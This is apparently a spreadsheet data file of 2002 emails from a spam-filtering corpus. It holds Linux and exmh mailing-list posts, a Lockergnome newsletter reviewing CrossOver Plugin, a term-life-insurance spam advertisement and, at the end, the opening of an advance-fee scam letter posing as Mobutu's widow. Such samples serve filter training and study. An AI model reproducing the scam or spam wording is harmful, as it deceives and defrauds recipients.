 -- October 16th/17th 2002, see http://www.digitaltransactionsforum.com/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</si>
  <si>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Free Term Life Insurance Quotes                 LGJDG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</si>
  <si>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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font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href=3D"http://www.marketing-leader.com/user0202/termquotes/473400/index.h=
 tm"&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://www.marketing-leader.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 kideesh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</si>
  <si>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OSCOM Berkeley report: Xopus, Bitflux, Plone, Xoops
</t>
  </si>
  <si>
    <t xml:space="preserve">I attended the same conference, and was impressed by a few systems that
 Jim didn't mention. In terms of CMS, the following all had apparently
 been used in some fairly large implementations and looked like some
 pretty strong competition to commercial systems:
 - Midgard, http://www.midgard-project.org/ , a PHP-based content
 management framework that with other programs combines to be a full CMS
 - Redhat CCM CMS, Java-based: http://www.example.com/software/ccm/cms/
 - OpenCMS, Java-based: http://www.opencms.org
 There was agreement that usability has not generally been an open source
 strength, but both Plone and Xopus represented some real movement
 towards improving that situation.
 I was impressed by the spectrum of perspectives on XML. Some took for
 granted that XSLT was relevant to content management, others took it
 just as for granted that XSLT was irrelevant and seemed happy to ignore
 XML almost completely. 
 I attended realizing that "content management" is generally used to
 apply to *Web* content management, but I was still a bit shocked how
 completely out of scope document management was (almost no consideration
 of the potential print/PDF dimension to content other than the
 occasional "...and you can use FOP to make PDF" as if that was
 functional): this seems more the case in open source content management
 than in commercial content management, and probably makes XML easier to
 ignore (if HTML is the be-all and end-all of the output...).
 The honesty was refreshing, Phil Suh complained about the state of
 current tools (both open source and commercial), and I wish I'd written
 down what he said, something like "it sucks so extremely, it sucks so
 widely, and it is so generally sucking, that it seems sometimes there is
 no hope." For a moment there was contemplation that perhaps commercial
 systems scaled so well that the commercial "big boys" were really much
 more functional than open source, until someone pointed out, "OK, take
 some average blog software, spend $500,000 on the rollout... it'll scale
 pretty well." Another quote (citing Brendan Quinn): "content management
 problems are either trivial or impossible."
 Mac OS X is getting popular, of the laptops there it was an even 1/3
 each of Mac, Linux, Windows.
 I am sure it wasn't news to Jim, but I can't wait to try Subversion, a
 CVS replacement that supports some of the newer features of WebDAV:
 http://subversion.tigris.org/
 I'm also eager to try Xopus, I hope the developers make it back home
 safely, they said they'd only been in America four days but were already
 homeless...
 Max
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 20, 2002 at 03:07:35PM +0100, Anthony wrote:
 &gt; &gt; &gt; In my experience Windows will change the hardware clock the first time
 &gt; &gt; &gt; you boot into it after the clocks have gone forward/back an hour.  This
 &gt; &gt; &gt; will only happen twice a year. How to stop it, I have not checked (I
 &gt; &gt; &gt; just switch the clock back an hour from within windows after such a
 &gt; &gt; &gt; reboot).  Is there a GMT windows timezone?
 &gt; &gt; _x0018_
 &gt; 
 &gt; &gt; Start-&gt;Settings-&gt;Control Panel-&gt;Date/Time-&gt;Time Zone tab-&gt; Uncheck
 &gt; &gt; "Automatically adjust clock for daylight saving change".
 &gt; &gt; 
 &gt; 
 &gt; Ah, that's grand. I knew about that aspect and had already unchecked the
 &gt; appropriate box. I was just worried that Windows was engaging in
 &gt; undocumented behaviour that I didn't know about.
 &gt; 
 well, it changes the time then, and then leaves it alone.
 However, Windows expects the time in the RTC to be local time. Linux
 can be configured to do either this, or to have the RTC at UTC,
 and then use /etc/localtime to figure out the right timezone.
 Depending on how you've set it up, this may be a problem (with one
 or other of the OS's one hour out). OS-X also does this silliness :(
 (RTC should always have UTC, that way different people can set their
 own timezone on the machine... though I suppose that only applies
 to multi-user machines).
 L.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">At 7:44 PM -0400 on 9/23/02, Geege Schuman wrote:
 &gt; First, misattribution.
 My apologies. Rave on...
 Cheers,
 RAH
 "Where all the children are above average..."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</si>
  <si>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[use Perl] Headlines for 2002-09-17
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 New Perl Mongers Web Site
     posted by KM on Monday September 16, @08:41 (groups)
     http://use.perl.org/article.pl?sid=02/09/16/1243234
 Java vs. Perl
     posted by pudge on Monday September 16, @11:15 (java)
     http://use.perl.org/article.pl?sid=02/09/16/1448246
 This Week on perl5-porters (9-15 September 2002)
     posted by rafael on Monday September 16, @16:17 (summaries)
     http://use.perl.org/article.pl?sid=02/09/16/2026255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</si>
  <si>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&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020709.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020709.html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&lt;/style&gt;&lt;title&gt;20020709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07.09.2002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I don't usually spend much time explaining metaphors. They are, after all, 
 metaphorical. They can be filled with whatever symbolism you choose. Written 
 well, we all come to some similar understanding of their meaning. But, I'll 
 depart today, contrary to my normal practice, to take a few minutes explaining a 
 recent metaphor.&lt;p&gt;
 I'm a Linux guy through and through. As a user, I see myself as right about at 
 the average on the curve. For love of the language and open source attitude, 
 though, you'd be hard-pressed to find anyone with quite the same level of 
 enthusiasm. Put simply, there's very little about the Linux and broader open 
 source worlds that I don't like or believe in.&lt;p&gt;
 Take, for example, the practice of recursive acronyms. GNU ("Gnu's Not Unix"), 
 HURD ("Herd of Unix-Replacing Daemons"), WINE ("Wine Is Not an Emulator"), even 
 PHP ("PHP Hypertext Processor") - all carry on the tradition of recursion in the 
 Unix/Linux world. Goofy as it sounds, I love this stuff.&lt;p&gt;
 So it is that I set out to create a recursive metaphor last week. It could only 
 have happened on or about the 4th of July. In fact, it happened in the edition 
 of the 3rd. I wrote a piece about how we Americans spend more time over the 
 course of a year talking about what's &lt;i&gt;wrong&lt;/i&gt; with our system than what's 
 right. I wrote it knowing full well that many of the responses I'd get would be 
 a) from readers outside the US and b) in sharp disagreement to my comments or 
 those of citizens of other countries. You're following me, right? People would 
 disagree with an article that said we spend much time disagreeing. This, of 
 course, would prove my point in a somewhat metaphorical way - the perfect 
 recursive metaphor. The point was to be made yet more perfectly by the eventual 
 inclusion in Penguin Shell of the comments of someone from &lt;i&gt;outside&lt;/i&gt; the US 
 disagreeing with my take our argumentativeness as Americans. Ideally, they would 
 be comments that disagreed with our collective American perception of being 
 disagreeable. They would, of course, point out things about which citizens of 
 other countries can disagree with Americans on. By exercising the right to 
 disagree, we'd subtly agree that we have that right. Yet another level of 
 recursion and a final layer of metaphor.&lt;p&gt;
 The response to both my own and Johan Sauviller's comments was overwhelming. In 
 the main, I believe both were appreciated. Many commented on the balance of the 
 two pieces. Some readers were surprised, I think, to see a dissenting opinion 
 published so quickly, if at all. Overall, the ability to express honestly held 
 opinions, to agree and to disagree on a global level closed the circle on the 
 metaphor in a perfect way.&lt;p&gt;
 Things have, however, gotten a bit more ugly in the past few days. I'm not sure 
 whether some were slow in getting to the July 3rd issue, or whether it's just 
 been stewing since then. Take, for instance, these comments by a reader who will 
 remain mercifully nameless:
 &lt;blockquote&gt;
 We get enough
 America bashing from our left-wing whacko extremist press and schools here
 in the USA that we don't wish to hear some (insert favorite adjective here)
 from Belgium whining too!
 &lt;/blockquote&gt;&lt;p&gt;
 Followed by:
 &lt;blockquote&gt;
 ... please don't let Tony single-handedly tarnish the fine reputation
 of Lockergnome. I'm sure there are other articulate Linux experts out there who 
 would be able to replace him.
 &lt;/blockquote&gt;&lt;p&gt;
 ... and, in a later note on the topic ...
 &lt;blockquote&gt;
 Censorship is to be encouraged in a
 free-market society whenever and wherever it doesn't come from the
 government.
 &lt;/blockquote&gt;&lt;p&gt;
 Clearly, the metaphor just whizzed right over the heads of some.&lt;p&gt;
 &lt;a href="http://www.lockergnome.com/issues/daily.html" target="_blank"&gt;Chris&lt;/a&gt; 
 has been great about allowing all his authors plenty of room in the editorial 
 piece at the beginning of each newsletter. This particular piece is no 
 exception. He's shown a quiet confidence in the face of some very shrill 
 comments. While we all generally stay focused on technical issues, Chris has 
 shown unwavering support for the notion that we geeks are, in the end, humans 
 with opinions and thoughts to share. I think it's one of the things that makes 
 the Lockergnome newsletters stand out from the pack - the personal touch.&lt;p&gt;
 So, despite the irrationality of some of this week's comments, I'll continue to 
 occasionally throw in a personal aside with the technical stuff.&lt;p&gt;
 Just watch out. Recursive metaphors are only funny until someone puts an eye 
 out.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Win Apps in Linux?&lt;/b&gt;&lt;p&gt;
 Yesterday, I mentioned an interesting review of two products for Linux by &lt;a 
 href="http://www.codeweavers.com/" target="_blank"&gt;CodeWeavers&lt;/a&gt; - CrossOver 
 Office and CrossOver Plugin. You've probably heard of both by now, as they've 
 garnered quite a bit of publicity both in and out of the Linux world. You'll 
 recall that I promised to try to secure copies for review this week. With the 
 help of a friendly sales rep at CodeWeavers, I was able to accomplish that task 
 this morning. True to the second half of the promise, we'll spend the next few 
 days looking at these two products and how they might impact your Linux use. 
 Let's take them in chronological order, starting today with CrossOver Plugin.&lt;p&gt;
 A bit of background is in order. CodeWeavers is, in their own words, " ... the 
 leading corporate backer of the &lt;a href="http://wine.codeweavers.com/" 
 target="_blank"&gt;Wine Project&lt;/a&gt;. Wine has been, for the past several years, an 
 ongoing project to port Windows applications to Linux. It's a tough goal, but 
 it's also one that's been undertaken by &lt;a href="http://www.lindows.com/" 
 target="_blank"&gt;others&lt;/a&gt; in the past year or so. Though the progress has been 
 slow, the Wine project has managed to stay at the front of this development 
 realm.&lt;p&gt;
 &lt;a href="http://codeweavers.com/products/crossover/" target="_blank"&gt;CrossOver 
 Plugin&lt;/a&gt; marks a change in the philosophy of the Wine Project. Prior to its 
 release, Wine had taken a "full system" approach. Running Windows applications 
 in Wine required the installation of a sizeable daemon and no small amount of 
 configuration work. CrossOver Plugin has moved Wine away from the system-wide 
 approach to one that's much more modular. Rather than executing at system 
 startup, Wine is called as-needed, with the virtual Windows path to the called 
 program. When the program is closed, so is Wine. CrossOver Plugin has focused on 
 creating Linux functionality with &lt;i&gt;one&lt;/i&gt; related set of Windows 
 applications: browser plugins.&lt;p&gt;
 The results stand as a clear indication that the change in philosophy is a 
 success. Off the top, CrossOver Plugin bundles QuickTime 5, Windows Media Player 
 6.2, Shockwave 8.5, Flash 6, and RealPlayer 8 into a Linux-accesible browser 
 plugin package. Throw in more esoteric apps like IPix, Trillian, Authorware Web 
 Player 6 and eFax Messenger 2, and you've got virtually every need plugin need 
 covered.&lt;p&gt;
 But this package doesn't stop there. Included in the CrossOver Plugin package 
 are viewers for Word, Excel and Powerpoint, as well as several 
 Microsoft-oriented fonts. Honestly, I was stunned at the range of applications 
 offered by the CodeWeavers developers.&lt;p&gt;
 Having had some experience with Wine, I was a bit leery about the install 
 process and about the ability to get all these great applications to work with 
 my RedHat setup. I've never been completely successful with Wine, but I hoped 
 for the best when I started the CrossOver Plugin installation. I really did want 
 these apps to work.&lt;p&gt;
 The installation was quite easy. By running the install-crossover.sh script from 
 the command line, I was able to install the installers for both CrossOver Plugin 
 and CrossOver Office, which we'll talk about tomorrow. I started the plugin 
 installs with QuickTime, a tool I've admittedly missed in Linux. In the 
 background, CrossOver Plugin had already created a virtual C:\ drive on my 
 machine. I clicked on the QuickTime install and immediately saw a familiar sight 
 - the Vise installer in its Windows format. CrossOver Plugin first checked for 
 feedback from the Windows binary, opened a virtual Windows window, then stepped 
 out while the Vise installer took care of the rest. Though the install failed 
 four times, it appeared to be a server failure rather than a failure of the 
 CrossOver program. I kept "retry"ing and, with some persistence, managed to get 
 a full QuickTime 5 install downloaded from the Apple servers. Quite literally, 
 the install looked and performed exactly as I've seem many times in Windows. 
 When the install was completed, CrossOver again checked for the Windows binary, 
 located the appropriate .dll files in the virtual C:\ drive and dropped the 
 plugins into the /home/tony/.netscape/plugins and /home/tony/.mozilla/plugins 
 directories.&lt;p&gt;
 The process was so smooth that I had to check the plugin listings in these 
 browsers - "Help", "About Plugins." Sure enough, the CrossOver QuickTime plugin 
 was listed. Quickly, I ran out to the Apple site and opened the "Men In Black 
 II" movie trailer. QuickTime performed flawlessly.&lt;p&gt;
 I followed with the Windows Media Player, Shockwave, Flash, IPix, and eFax 
 Messenger installs. Of those, the only ones that weren't self-contained in the 
 CrossOver install were IPix and eFax. Even at that, the installer pointed me to 
 the Windows download then found the .exe file when the download was done. Within 
 a half-hour, I had all installed and tested.&lt;p&gt;
 Then, just for grins, I installed RealPlayer 8 via CrossOver. This was despite 
 the recommendation in the installer screen to use the Linux version. It went as 
 smoothly as the others with one caveat - the player played media files at a much 
 faster speed than that in Windows. Fast enough to make me laugh, in fact, 
 reminded of Dave and Alvin the Chipmunk. Ah well, six out of seven is pretty 
 strong given my previous troubles with Wine.&lt;p&gt;
 I also installed a few fonts - Arial, Times New Roman, Trebuchet, and Veranda. 
 In every case, the install was quick and absolutely painless.&lt;p&gt;
 Wine has always held great promise. At times, it's been painful to watch the 
 tedious pace of development, only because that promise was so alluring. With the 
 backing of CodeWeavers and a fundamental change in the approach to development, 
 Wine has finally realized the goal of integrating Windows applications 
 seamlessly into the stable Linux environment. The results are so strong that, if 
 I didn't know better, I'd swear that a few of these plugins actually run better 
 in Linux than in their native Windows. Honestly, I didn't realize how much I 
 missed them until I started using them in Linux today.&lt;p&gt;
 Tomorrow holds a few surpirses, with a look at CodeWeavers' CrossOver Office 
 package.&lt;p&gt;&lt;p&gt;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IX&lt;/b&gt;&lt;p&gt;
 We're nine parts into the kernel configuration series, with quite a bit yet to 
 go. If you haven't been following along, we're breaking out the configuration 
 screens one at a time in an attempt to shed some light on the purpose and 
 function of each. With that knowledge, you should be able to make a clear 
 decision as to how to configure each section.&lt;p&gt;
 Today, it's the Parallel Port support section. This is pretty simple. If you 
 need parallel port support - such as for a printer - select this option either 
 as a driver built into the kernel or as a loadable module.&lt;p&gt;
 Most will use the PC-style hardware option in conjuction with a Windows printer. 
 But that's not all the parallel port can be used for. As an example, the builds 
 I did with the telescope company required parallel port support, as the 
 telescope cameras were attached to this port.&lt;p&gt;
 Be aware - this kernel configuration option only makes a driver available for 
 the parallel port. The computer's BIOS sets the mode for the port - ECP, EPP, or 
 Auto. On the majority of modern computers, the Auto mode is the default and will 
 work just fine. However, if you have problems communicating with your printer 
 following a kernel recompile, try changing the mode of your printer in the 
 BIOS.&lt;p&gt;
 Tomorrow, it's Plug and Play configuration.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Netics 2.0&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" 
 href="http://www.citi.umich.edu/u/marius/netics/"&gt;http://www.citi.umich.edu/u/marius/netics/&lt;/a&gt;&lt;p&gt;
 "Netics is an extensible network statistics collector. It puts the network 
 interface in promiscuous mode and reads the data stream (after it strips off the 
 appropriate protocol headers), then displays the results at specified intervals, 
 either in a "progress bar" mode or as raw statistics. Currently, it supports 2 
 statistics, both involving entropy: LZW compressability and Ueli Maurer's 
 universal statistical test. Maurer's test is a very good and comprehensive 
 measure of entropy, but requires a large amount of data. The LZW statistic 
 requires much less data."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Helping Hand&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Karl Steenblik&lt;/span&gt;&lt;p&gt;
 "Dear Linux community at Lockergnome.&lt;p&gt;
 "I am the web master for largest health care camp in the State of Utah. 
 No not Cancer camp it is the Diabetic camp.&lt;p&gt;
 "The Foundation for Children and Youth with Diabetes serves about 900
 diabetic children a year and their families.  We have education, family
 support, diet planning and most important is camp.  The place where kids
 can learn about how to better manage their disease.&lt;p&gt;
 "We are a totally non profit camp that puts all money from fees into our
 camp.  We pay no salaries to Physicians, Dietitians, Social Workers,
 Nurses and educators that make our camp possible.  Yes even me the lowly
 web master donates his time and web space at ATT to the cause.&lt;p&gt;
 "ATT recently decided to pull access to our photo page due to a password
 protection.  We give out a password to all parents so that they can see
 photos of camp while the sessions are happening.  We do not however what
 the creeps of the web to have access to photos of our kids.&lt;p&gt;
 "We are looking for someone in the state to help our camp by donating web
 space.  Now it may not be your organization, but I know Linux people and
 Lockergnome and I think someone there may know someone who would be able
 to help us.&lt;p&gt;
 "You can still have access to the public part of our site that ATT has not
 shut down at www.fcyd-inc.org.&lt;p&gt;
 "Please I have the parents of 120 diabetic kids wanting to see photos of
 their children.  They are all e-mailing me and I have no one to turn to.&lt;p&gt;
 "Hoping to hear from someone soon."&lt;p&gt;
 Karl R Steenblik&lt;br&gt;
 Webmaster FCYD camp&lt;br&gt;
 Salt Lake City.&lt;p&gt;
 &lt;a href="mailto:tony@lockergnome.com?subject=Penguin Shell - Donate Web 
 Space"&gt;Help&lt;/a&gt; Karl.&lt;p&gt;
 &lt;p&gt;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&lt;b&gt;Mobilix.org&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://mobilix.org/"&gt;http://mobilix.org/&lt;/a&gt;&lt;p&gt;
 Mobilix.org is a full site related to using Linux on mobile devices, including 
 PDAs and laptops. It includes information for subsctibing to the linux-laptop 
 mailing list, information on Linux-powered wearable computers, WAP enabled 
 access, and Linux on cell phones. Mobilix looks to be a great resource for all 
 kinds of tips, tricks and useful information for taking your Linux on the 
 road.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/20020709.html"&gt;http://www.lockergnome.com/issues/penguinshell/20020709.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org]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</si>
  <si>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Gordon Mohr:
 &gt;It was clear you were talking about averages. But it should 
 &gt;be equally clear that that isn't what people mean when they
 &gt;use the word "promiscuity". 
 Sigh.
 This sprung out of a report linked by Cindy about the promiscuity of
 female monkeys with males other than the alpha male, i.e, specifically
 not the tail end of the distribution.  "By mating with as many
 extra-group males as possible, female langurs ensure [etc.]"
 &gt;OK, then. Consider a population of 1,000,000. 500,000 men each
 &gt;pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
 &gt;also has sex with the other 499,999 women
 This has never happened.  Its relevance is nil.
 &gt;Averages are useful, sure -- but much more so if called by their 
 &gt;actual name, rather than conflated with another concept.
 So I chose not to type "on average" explicitly in my post, since this
 is FoRK and one tends to assume that people have a clue.
 There is no disagreement between us, except that I am more interested
 in typical behaviour and you in extreme.  Actually, you probably just
 had a bad day and felt like jumping down my throat for the hell of it.
 EOT, AFAIC.
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">At 2:46 PM -0400 8/13/02, Theo Van Dinter wrote:
 &gt;On Tue, Aug 13, 2002 at 01:01:42PM -0500, Justin Shore wrote:
 &gt;&gt;  Ah...  You learn something new every day!  This would make things
 &gt;&gt;  quite a bit easier.  I assume it can handle a mailbox full of mail to
 &gt;&gt;  report rather than a single piece of spam from STDIN.  I'll check the
 &gt;&gt;  docs on that though.
 &gt;
 &gt;Unfortunately not, it's a one at a time thing.  If it would help
 &gt;you, I have a script that I use which handles a mbox file at a time,
 &gt;strips the SA stuff, reports to razor, and can then do things like
 &gt;open relay checks, reports to spamcop, etc.  It's available via:
 &gt;http://www.kluge.net/~felicity/random/handlespam.txt
 I'll give that a looksie.  I've been running a week's worth of 
 maillog relay= IPs through rbcheck every Sunday.  Found quite a few. 
 I should break up the list and run multiple rbcheck instances.  Just 
 haven't gotten there yet though.  I think I'll have either MIMEDefang 
 or Procmail keep a copy of messages over a certain score for daily 
 razor-reporting.  I could just let SA do it too I suppose.
 Say, maybe you can tell me what I'm doing wrong in SA.  I added 
 report_header 1 to my 
 /etc/mail/mimedefang/spamassassin/sa-mimedefang.cf but it didn't 
 appear to change anything.  I bounced over another copy of spam to my 
 spamtrap and it still created the SPAM: attachment.  sa-mimedefang.cf 
 has this in it now:
 required_hits           1
 auto_report_threshold   100
 ok_locales              en
 rewrite_subject 0
 report_header 1
 use_terse_report 1
 defang_mime 0
 skip_rbl_checks 1
 I can't figure out if that was the write cf to modify or not.  I also 
 have a /etc/mail/spamassassin/local.cf but it's empty.  I think I 
 might be taking too many bites out of too many pies at once. :-)  The 
 required_hits changes I made to sa-mimedefang.cf seem to have worked. 
 I don't know why the report_header change didn't though.  Any ideas?
 Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR      Pittsburg State University
 Network &amp; Systems Manager       Kelce 157Q
 Office of Information Systems   Pittsburg, KS 66762
 Voice: (620) 235-4606           Fax: (620) 235-4545
 http://www.pittstate.edu/ois/
 Warning:  This message has been quadruple Rot13'ed for your protection.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</si>
  <si>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Um, you've confused RealAudio and RealNames. Bad bits.
 Luis
 On Wed, 2002-07-31 at 18:28, Gregory Alan Bolcer wrote:
 &gt; This comment probably goes into better late than never but:
 &gt; I wonder if their decision to open source their code had
 &gt; anything to do with it.
 &gt; 
 &gt; I've read through their asset sheet, but it doesn't say anything
 &gt; about their real assets--their customers.  Anyone know if they
 &gt; have any left?
 &gt; 
 &gt; Greg
 &gt; 
 &gt; Jim Whitehead wrote:
 &gt; 
 &gt; &gt; Via Dave's Scripting News:
 &gt; &gt; 
 &gt; &gt; http://www.theregister.co.uk/content/23/25245.html
 &gt; &gt; 
 &gt; &gt; RealNames Corp., the VC-funded wheeze that promised to short-circuit the DNS
 &gt; &gt; system by doing an exclusive deal with Microsoft, has announced that it will
 &gt; &gt; cease trading as of today.
 &gt; &gt; 
 &gt; &gt; RealNames' proposition was simple, and on the face of it, a no-brainer. Type
 &gt; &gt; a real word or phrase into your browser and it would guide you to your
 &gt; &gt; destination, bypassing all this cumbersome domain name business. A nice
 &gt; &gt; idea, but one based on the assumption that people are fairly stupid, and
 &gt; &gt; couldn't figure out that Comp USA's website might be say, CompUSA.com, and
 &gt; &gt; that even if you mistook whitehouse.gov for whitehouse.org, you'd be unhappy
 &gt; &gt; about the serendipitous diversion.
 &gt; &gt; 
 &gt; &gt; *snip*
 &gt; &gt; 
 &gt; &gt; Microsoft cancelled its contract with RealNames earlier this year, and as a
 &gt; &gt; consequence - the company has no "Plan B" - it's now toast.
 &gt; &gt; 
 &gt; &gt; - Jim
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; http://xent.com/mailman/listinfo/fork
 &gt; &gt; 
 &gt; &gt; 
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Gregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com
 &gt; Endeavors Technology, Inc. | cell: +1.714.928.5476 | http://endeavors.com
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Of the three lying politicians, which liar would you take?
 ----- Original Message ----- 
 From: "John Hall" &lt;johnhall@evergo.net&gt;
 To: "FoRK" &lt;fork@spamassassin.taint.org&gt;
 Sent: Monday, September 23, 2002 2:23 PM
 Subject: RE: Goodbye Global Warming
 &gt; "I did not have sex with that woman."
 &gt; 
 &gt; &gt; -----Original Message-----
 &gt; &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; Mr.
 &gt; &gt; FoRK
 &gt; &gt; Sent: Monday, September 23, 2002 2:12 PM
 &gt; &gt; To: FoRK
 &gt; &gt; Subject: Re: Goodbye Global Warming
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; ----- Original Message -----
 &gt; &gt; From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; &gt; 
 &gt; &gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; &gt; &gt; would have had to invent it.
 &gt; &gt; A Republican once said "I am not a crook".
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: inbox mail notification broken
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 sorry, but I am not very familiar with this sequence business and
 couldn't find an answer to my problem in the documentation.
 In fact, to be precise, it seems only to be the highlighting in
 the folder cache part and only for the inbox which does not work.
 Is there anything I could/should check ? Any file, .. ?
 Thanks,
 Marc
 &gt;&gt;&gt; Robert Elz said:
  &gt;&gt;     Date:        Tue, 06 Aug 2002 09:04:58 +0100
  &gt;&gt;     From:        Marc Baaden &lt;baaden@smplinux.de&gt;
  &gt;&gt;     Message-ID:  &lt;E17bzKv-0000mo-00@frontend2.herald.ox.ac.uk&gt;
  &gt;&gt; 
  &gt;&gt;   | Any hints ?
  &gt;&gt; 
  &gt;&gt; Probably a private sequence has gotten set, the highlighting only
  &gt;&gt; works for public ones.
  &gt;&gt; 
  &gt;&gt; If "scan unseen" works as you'd expect, but highlighting doesn't,
  &gt;&gt; that's the usual explanation.
  &gt;&gt; 
  &gt;&gt; kre
  &gt;&gt; 
  &gt;&gt; 
  &gt;&gt; 
  &gt;&gt; _______________________________________________
  &gt;&gt; Exmh-users mailing list
  &gt;&gt; Exmh-users@redhat.com
  &gt;&gt; https://listman.redhat.com/mailman/listinfo/exmh-users
  &gt;&gt; 
 Marc Baaden
 -- 
  Dr. Marc Baaden - Laboratory of Molecular Biophysics, Oxford University
  mailto:baaden@smplinux.de  - ICQ# 11466242 -  http://www.marc-baaden.de
  FAX/Voice +49 697912 39550  -  Tel: +44 1865 275380  or  +33 609 843217
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Exmh/nmh (was Sorting)...
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I am facing the fact that exmh has been left behind in some industry
 &gt; standards.  I use it for my personal mail.  My mail server runs unix,
 &gt; and I connect over ssh and tunnel my X traffic over ssh.  With a slow
 &gt; link, this makes exmh very slow.  And mime handling is pretty bad
 &gt; compared with modern mailers.
 These are some good comments and I'd like to share an opinion here.  (Is that permitted? :)
 I started using linux about 8 or 9 years ago in rebellion against what the university was doing with Winder$.  I just couldn't get good support and was using a lot of unix-based tools (ported to Winder$) anyway. So, I jumped ship and became my own sysadm.
 What I got was the easy ability to use a shell (now ssh) to connect to my office box from just about anywhere and use either exmh or nmh (from the command line).  I can do email for the office fairly easily.
 I haven't seen any other tools that let me do that yet.  But, I have to admit, that some of the web-based mail software is getting pretty close.  Quoting and such is still primitive, but they're moving forward.
 -=d
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Problem building lame-3.92-fr5.src.rpm on RH8
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Coy wrote :
 &gt; I can't seem to build this package. It errors out because rpm found 
 &gt; files not included in any of the packages. I tried getting them addes 
 &gt; (it's the documentation that is being loaded) and was unsuccessful. 
 &gt; Anyone get this to work?
 Hi,
 Could you post the list of files in question? Maybe more docs get generated
 when a certain doc tool is installed and that I didn't have it installed
 when I rebuilt the package :-/
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.06 0.12 0.09, AC on-line, battery charging: 100% (1:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Another fine mess I've got myself into...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597655,215/
 Date: 2002-10-06T02:28:00+01:00
 *Politics:* Disgraced peer Jeffrey Archer is set to make 1m from his Belmarsh 
 diaries. But the coup could cost him another year inside, reports *Kamal Ahmed*
 .
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: No more spell-check
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday 16 August 2002 08:24 pm, Peter wrote:
 &gt; Hi,
 &gt;
 &gt; my exmh-2.5 suddenly will not spell-check anymore. If I click
 &gt; More..., Spell... a window opens and is gone just as fast.
 &gt;
 &gt; I don't recall having tinkered with anything.
 &gt;
 &gt; How can I get spell-checking back?
 It may be a conspiracy against spell checkers. I noticed the Spell icon 
 was dimmed in Netscape Communicator 4.79 about a month ago. It worked 
 for years prior.
 -- 
 David Kelly N4HHE, dkelly@hiwaay.net
 =====================================================================
 The human mind ordinarily operates at only ten percent of its
 capacity -- the rest is overhead for the operating system.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] URGENT ASSISTANT NEEDED
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear friend,
 I am Mrs. Sese-seko widow of late President Mobutu Sese-seko of Zaire, now known as Democratic Republic of Congo (DRC). I am moved to write you this letter. 
